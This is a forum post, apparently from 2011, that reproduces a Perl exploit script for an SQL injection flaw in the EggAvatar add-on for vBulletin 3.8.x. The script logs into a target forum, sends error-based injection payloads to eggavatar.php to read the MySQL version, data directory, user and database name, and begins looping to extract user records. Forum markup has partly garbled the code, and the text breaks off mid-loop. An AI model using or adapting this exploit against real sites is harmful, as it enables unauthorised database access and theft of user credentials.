07.03.2011, 13:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
[PHP]
PHP:
[COLOR="#000000"]#!/usr/bin/env perl
useLWP::UserAgent;
sub banner{
print"###################################\n";
print"############ DSecurity ############\n";
print"###################################\n";
print"# Email:dsecurity.vn[at]gmail.com #\n";
print"###################################\n";
}
if(@ARGVnew();
$ua->agent("DSecurity");
$ua->cookie_jar({});
sub login(@){
my $username=shift;
my $password=shift;
my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login');
$req->content_type('application/x-www-form-urlencoded');
$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf=");
my $res=$ua->request($req);
}
sub v_request{
#Declare
$print=$_[0];
$select=$_[1];
$from=$_[2];
$where=$_[3];
$limit=$_[4];
$sleep=$ARGV[4];
if ($from eq'') {$from='information_schema.tables';}
if ($where eq'') {$where='1';}
if ($limit eq'') {$limit='0';}
if ($sleep eq'') {$sleep='10';}
# Create a request
my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1");
# Pass request to the user agent and get a response back
my $res=$ua->request($req);
#print $res->content;
if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test= $3};
sleep($sleep);
return$print.$test."\n";
}
&banner;
print"\n############################################### ################################################## ############\n";
print"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n";
print"# Date:06-03-2011 #\n";
print"# Author: DSecurity #\n";
print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print"# Version: 2.3.2 #\n";
print"# Tested on: vBulletin 3.8.0 #\n";
print"################################################# ################################################## ##########\n";
#login
login($ARGV[1],$ARGV[2]);
#Foot print
printv_request('MySQL version: ','@@version');
printv_request('Data dir: ','@@datadir');
printv_request('User: ','user()');
printv_request('Database: ','database()');
#Get user
for($i=1;$i[COLOR="#007700"]
|
|
|
|